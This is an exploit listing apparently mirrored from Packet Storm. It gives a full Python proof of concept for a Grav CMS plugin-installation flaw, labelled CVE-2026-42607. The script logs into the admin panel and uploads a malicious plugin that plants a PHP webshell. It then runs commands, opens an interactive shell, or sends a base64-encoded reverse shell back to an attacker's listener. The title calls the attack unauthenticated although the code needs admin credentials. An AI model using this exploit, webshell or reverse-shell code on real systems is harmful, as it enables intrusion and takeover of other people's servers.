Share
## https://sploitus.com/exploit?id=PACKETSTORM:223728
==================================================================================================================================
    | # Title     : Grav CMS < 2.0.0-beta.2 Unauthenticated Plugin Installation leading to RCE                                       |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://getgrav.org/                                                                                             |
    ==================================================================================================================================
    
    [+] Summary    :  This Python exploit targets a vulnerability in Grav CMS versions prior to 2.0.0-beta.2, abusing the Admin β€œDirect Install” plugin feature to achieve remote code execution.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import os
    import sys
    import time
    import zipfile
    import tempfile
    import re
    import requests
    from urllib.parse import urljoin
    from bs4 import BeautifulSoup
    
    class GravRCE:
        def __init__(self, target_url, username, password, verbose=False, timeout=30):
            self.base_url = target_url.rstrip('/')
            self.username = username
            self.password = password
            self.verbose = verbose
            self.timeout = timeout
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
            self.csrf_token = None
            self.authenticated = False
            
        def log(self, msg, level="INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def get_csrf_token(self):
            """Extract CSRF token from login page"""
            login_url = urljoin(self.base_url, '/admin/login')
            self.log(f"Fetching CSRF token from {login_url}", "PROC")
            
            try:
                response = self.session.get(login_url, timeout=self.timeout)
                
                if response.status_code == 200:
    
                    soup = BeautifulSoup(response.text, 'html.parser')
    
                    for name in ['admin-nonce', 'csrf', '__csrf', 'nonce']:
                        token_input = soup.find('input', {'name': name})
                        if token_input:
                            self.csrf_token = token_input.get('value')
                            self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
                            return True
    
                    meta_tag = soup.find('meta', {'name': 'csrf-token'})
                    if meta_tag:
                        self.csrf_token = meta_tag.get('content')
                        self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
                        return True
                
                self.log("Could not find CSRF token", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Error fetching CSRF token: {e}", "ERROR")
                return False
        
        def authenticate(self):
            """Authenticate to Grav Admin panel"""
            login_url = urljoin(self.base_url, '/admin/login')
            self.log(f"Authenticating as {self.username}...", "PROC")
            
            data = {
                'username': self.username,
                'password': self.password,
                'admin-nonce': self.csrf_token,
                'task': 'login',
                'login': 'Login'
            }
            
            try:
                response = self.session.post(login_url, data=data, timeout=self.timeout)
                
                if response.status_code == 302 or response.status_code == 200:
    
                    if 'dashboard' in response.text.lower() or 'grav' in response.text.lower():
                        self.authenticated = True
                        self.log("Authentication successful", "SUCCESS")
                        return True
                    elif 'invalid' in response.text.lower():
                        self.log("Invalid credentials", "ERROR")
                        return False
                
                self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Authentication error: {e}", "ERROR")
                return False
        
        def create_malicious_plugin(self, plugin_name, shell_filename):
            """Create malicious plugin ZIP file"""
            self.log(f"Creating malicious plugin: {plugin_name}", "PROC")
    
            temp_dir = tempfile.mkdtemp()
            plugin_dir = os.path.join(temp_dir, plugin_name)
            os.makedirs(plugin_dir)
    
            plugin_php = f'''<?php
    namespace Grav\\Plugin;
    use Grav\\Common\\Plugin;
    
    class {plugin_name.capitalize()}Plugin extends Plugin {{
        public static function getSubscribedEvents(): array {{
            return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
        }}
        public function onPluginsInitialized(): void {{
            $shell_path = GRAV_ROOT . '/{shell_filename}';
            if (!file_exists($shell_path)) {{
                $shell_content = '<?php if(isset($_REQUEST["cmd"])){{ echo "<pre>"; system($_REQUEST["cmd"]); echo "</pre>"; }} ?>';
                file_put_contents($shell_path, $shell_content);
            }}
        }}
    }}
    ?>
    '''
    
            blueprints = f'''name: {plugin_name.capitalize()}
    version: 1.0.0
    description: "Plugin installed via direct install"
    author:
      name: Grav
    homepage: https://getgrav.org
    license: MIT
    form:
      validation: loose
      fields:
        enabled:
          type: toggle
          label: Plugin status
          highlight: 1
          default: 1
          options:
            1: Enabled
            0: Disabled
          validate:
            type: bool
    '''
    
            plugin_yaml = 'enabled: true\n'
    
            with open(os.path.join(plugin_dir, f"{plugin_name}.php"), 'w') as f:
                f.write(plugin_php)
            
            with open(os.path.join(plugin_dir, "blueprints.yaml"), 'w') as f:
                f.write(blueprints)
            
            with open(os.path.join(plugin_dir, f"{plugin_name}.yaml"), 'w') as f:
                f.write(plugin_yaml)
    
            zip_path = os.path.join(temp_dir, f"{plugin_name}.zip")
            with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
                for root, dirs, files in os.walk(plugin_dir):
                    for file in files:
                        file_path = os.path.join(root, file)
                        arcname = os.path.relpath(file_path, temp_dir)
                        zipf.write(file_path, arcname)
    
            with open(zip_path, 'rb') as f:
                zip_data = f.read()
    
            import shutil
            shutil.rmtree(temp_dir)
            
            self.log(f"Plugin created: {len(zip_data)} bytes", "SUCCESS")
            return zip_data
        
        def get_admin_nonce(self):
            """Extract admin nonce from direct-install page"""
            direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
            self.log("Fetching admin nonce...", "PROC")
            
            try:
                response = self.session.get(direct_install_url, timeout=self.timeout)
                
                if response.status_code == 200:
                    soup = BeautifulSoup(response.text, 'html.parser')
                    nonce_input = soup.find('input', {'name': 'admin-nonce'})
                    
                    if nonce_input:
                        admin_nonce = nonce_input.get('value')
                        self.log(f"Admin nonce obtained: {admin_nonce}", "SUCCESS")
                        return admin_nonce
                
                self.log("Could not find admin nonce", "ERROR")
                return None
                
            except Exception as e:
                self.log(f"Error fetching admin nonce: {e}", "ERROR")
                return None
        
        def upload_plugin(self, zip_data, plugin_name):
            """Upload plugin via Direct Install"""
            direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
            self.log(f"Uploading plugin to {direct_install_url}", "PROC")
    
            admin_nonce = self.get_admin_nonce()
            if not admin_nonce:
                return False
    
            files = {
                'admin-nonce': (None, admin_nonce),
                'data[file]': (f'{plugin_name}.zip', zip_data, 'application/zip'),
                'task': (None, 'direct-install')
            }
            
            try:
                response = self.session.post(direct_install_url, files=files, timeout=self.timeout)
                
                if response.status_code == 302 or response.status_code == 200:
                    if 'success' in response.text.lower() or 'installed' in response.text.lower():
                        self.log("Plugin uploaded and installed successfully!", "SUCCESS")
                        return True
                    elif 'error' in response.text.lower():
                        self.log(f"Installation error: {response.text[:200]}", "ERROR")
                        return False
                
                self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Upload error: {e}", "ERROR")
                return False
        
        def trigger_plugin(self):
            """Trigger plugin by accessing main page"""
            self.log("Triggering plugin to deploy webshell...", "PROC")
            
            try:
                response = self.session.get(self.base_url, timeout=self.timeout)
                
                if response.status_code == 200:
                    self.log("Plugin triggered successfully", "SUCCESS")
                    return True
                
                return False
                
            except Exception as e:
                self.log(f"Error triggering plugin: {e}", "ERROR")
                return False
        
        def check_webshell(self, shell_filename):
            """Verify webshell deployment"""
            shell_url = urljoin(self.base_url, shell_filename)
            self.log(f"Checking webshell at {shell_url}", "PROC")
            
            test_cmd = "echo WEBSHELL_TEST"
            
            try:
                response = self.session.get(shell_url, params={'cmd': test_cmd}, timeout=self.timeout)
                
                if response.status_code == 200 and 'WEBSHELL_TEST' in response.text:
                    self.log("Webshell is accessible!", "SUCCESS")
                    return shell_url
                
                return None
                
            except Exception as e:
                self.log(f"Webshell check failed: {e}", "ERROR")
                return None
        
        def execute_command(self, shell_url, cmd):
            """Execute command via webshell"""
            try:
                response = self.session.get(shell_url, params={'cmd': cmd}, timeout=self.timeout)
                
                if response.status_code == 200:
                    output = response.text
                    output = re.sub(r'<pre>', '', output)
                    output = re.sub(r'</pre>', '', output)
                    return output.strip()
                
                return None
                
            except Exception as e:
                self.log(f"Command execution error: {e}", "ERROR")
                return None
        
        def deploy_reverse_shell(self, shell_url, lhost, lport):
            """Deploy reverse shell payload"""
            self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
    
            rev_shell = f'''<?php
    $sock = fsockopen("{lhost}", {lport});
    if ($sock) {{
        exec("/bin/sh -i <&3 >&3 2>&3", $output);
        fwrite($sock, implode("\\n", $output));
        fclose($sock);
    }}
    ?>'''
            b64_shell = base64.b64encode(rev_shell.encode()).decode()
            deploy_cmd = f"echo '{b64_shell}' | base64 -d > /tmp/revshell.php && php /tmp/revshell.php"
            
            self.execute_command(shell_url, deploy_cmd)
            self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
        
        def run(self, shell_filename=None, lhost=None, lport=None, command=None):
            """Main exploit routine"""
            
            self.log(f"Target: {self.base_url}")
    
            if not self.get_csrf_token():
                self.log("Failed to get CSRF token", "ERROR")
                return False
    
            if not self.authenticate():
                self.log("Authentication failed", "ERROR")
                return False
    
            plugin_name = "shellplugin_" + str(int(time.time()))
            if not shell_filename:
                shell_filename = f"shell_{int(time.time())}.php"
            
            zip_data = self.create_malicious_plugin(plugin_name, shell_filename)
    
            if not self.upload_plugin(zip_data, plugin_name):
                self.log("Plugin upload failed", "ERROR")
                return False
    
            if not self.trigger_plugin():
                self.log("Failed to trigger plugin", "WARNING")
    
            shell_url = self.check_webshell(shell_filename)
            
            if not shell_url:
                self.log("Webshell not found. Exploit may have failed.", "ERROR")
                return False
    
            if command:
                self.log(f"Executing command: {command}")
                output = self.execute_command(shell_url, command)
                if output:
                    print("\n" + "=" * 60)
                    print(output)
                    print("=" * 60)
            
            elif lhost and lport:
                self.deploy_reverse_shell(shell_url, lhost, lport)
            
            else:
    
                self.log("Interactive shell mode. Type 'exit' to quit.", "SUCCESS")
                print("\n" + "=" * 60)
                print("Webshell available at:", shell_url)
                print("Commands will be executed on the target.")
                print("=" * 60 + "\n")
                
                while True:
                    try:
                        cmd = input("\033[92mshell>\033[0m ").strip()
                        if cmd.lower() in ['exit', 'quit']:
                            break
                        if cmd:
                            output = self.execute_command(shell_url, cmd)
                            if output:
                                print(output)
                    except KeyboardInterrupt:
                        print("\nExiting...")
                        break
            
            return True
    
    
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-42607 - Grav CMS Remote Code Execution",
            epilog="""
    Examples:
      python3 exploit.py -t http://localhost/grav -u admin -p admin123
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 -c "id"
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 --reverse-shell --lhost 10.0.0.5 --lport 4444
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 --interactive
            """
        )
        
        parser.add_argument("-t", "--target", required=True, help="Target Grav CMS URL")
        parser.add_argument("-u", "--username", required=True, help="Grav Admin username")
        parser.add_argument("-p", "--password", required=True, help="Grav Admin password")
        parser.add_argument("-c", "--command", help="Command to execute")
        parser.add_argument("--reverse-shell", action="store_true", help="Deploy reverse shell")
        parser.add_argument("--lhost", help="Listener host for reverse shell")
        parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
        parser.add_argument("--interactive", action="store_true", help="Interactive shell mode")
        parser.add_argument("--shell-file", help="Webshell filename (default: auto-generated)")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout (seconds)")
        
        args = parser.parse_args()
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    β•‘  CVE-2026-42607 - Grav CMS Remote Code Execution                β•‘
    β•‘  Unauthenticated Plugin Installation leading to RCE             β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
        
        exploit = GravRCE(
            target_url=args.target,
            username=args.username,
            password=args.password,
            verbose=args.verbose,
            timeout=args.timeout
        )
        
        if args.reverse_shell:
            if not args.lhost or not args.lport:
                print("[-] --reverse-shell requires --lhost and --lport")
                sys.exit(1)
            success = exploit.run(
                shell_filename=args.shell_file,
                lhost=args.lhost,
                lport=args.lport
            )
        elif args.interactive or args.command:
            success = exploit.run(
                shell_filename=args.shell_file,
                command=args.command
            )
        else:
            success = exploit.run(shell_filename=args.shell_file)
        
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================